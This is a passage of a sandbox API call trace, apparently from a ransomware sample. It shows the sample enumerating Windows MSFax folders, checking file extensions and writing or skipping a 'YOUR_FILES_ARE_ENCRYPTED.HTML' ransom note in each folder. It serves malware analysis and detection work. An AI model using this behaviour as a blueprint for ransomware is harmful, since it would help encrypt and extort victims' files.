0x73f0050 [0170.020] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0170.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*" [0170.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc1333e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1333e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.021] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0170.021] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.021] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.021] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0170.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\activitylog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.021] GetProcessHeap () returned 0x270000 [0170.022] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.022] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 67 [0170.022] GetProcessHeap () returned 0x270000 [0170.022] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.023] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0170.023] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*" [0170.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc159540, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc159540, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.023] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 73 [0170.023] GetProcessHeap () returned 0x270000 [0170.023] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0170.025] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0170.026] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*" [0170.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x91817478, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcc1333e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1333e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.026] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 87 [0170.026] lstrcmpW (lpString1="confident.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.026] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0170.026] lstrlenW (lpString=".cov") returned 4 [0170.026] PathFindExtensionW (pszPath="confident.cov") returned=".cov" [0170.026] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned 81 [0170.026] lstrcmpW (lpString1="fyi.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.026] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0170.026] lstrlenW (lpString=".cov") returned 4 [0170.026] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned 85 [0170.027] lstrcmpW (lpString1="generic.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.027] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0170.027] lstrlenW (lpString=".cov") returned 4 [0170.027] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned 84 [0170.027] lstrcmpW (lpString1="urgent.cov", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.027] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0170.027] lstrlenW (lpString=".cov") returned 4 [0170.027] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0170.027] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.027] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.027] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0170.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.028] GetProcessHeap () returned 0x270000 [0170.028] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.028] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0170.028] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.028] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.028] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0170.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.029] GetProcessHeap () returned 0x270000 [0170.029] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.029] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 55 [0170.029] GetProcessHeap () returned 0x270000 [0170.029] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.029] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0170.029] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*" [0170.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc159540, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc159540, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.030] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.030] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.030] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.030] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\inbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.030] GetProcessHeap () returned 0x270000 [0170.031] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 55 [0170.031] GetProcessHeap () returned 0x270000 [0170.031] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.031] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue" [0170.031] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*" [0170.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc159540, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc159540, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.031] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.031] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.031] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.031] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0170.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\queue\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.032] GetProcessHeap () returned 0x270000 [0170.032] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.032] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 59 [0170.032] GetProcessHeap () returned 0x270000 [0170.032] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.032] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems" [0170.032] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*" [0170.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcc17f6a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc17f6a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.033] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0170.033] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.033] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.033] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0170.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\sentitems\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.033] GetProcessHeap () returned 0x270000 [0170.034] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.034] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 62 [0170.034] GetProcessHeap () returned 0x270000 [0170.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.034] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0170.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*" [0170.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcc1a5800, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc1a5800, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.034] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned 68 [0170.034] GetProcessHeap () returned 0x270000 [0170.034] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0170.034] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0170.034] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*" [0170.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcc17f6a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc17f6a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.035] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif") returned 83 [0170.035] lstrcmpW (lpString1="WelcomeFax.tif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.035] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0170.035] lstrlenW (lpString=".tif") returned 4 [0170.035] PathFindExtensionW (pszPath="WelcomeFax.tif") returned=".tif" [0170.035] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.035] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.035] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.035] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0170.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.035] GetProcessHeap () returned 0x270000 [0170.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0170.036] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0170.036] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.036] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.036] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 92 [0170.036] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.036] GetProcessHeap () returned 0x270000 [0170.037] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.037] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.037] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.037] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.037] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0170.037] CreateFileW 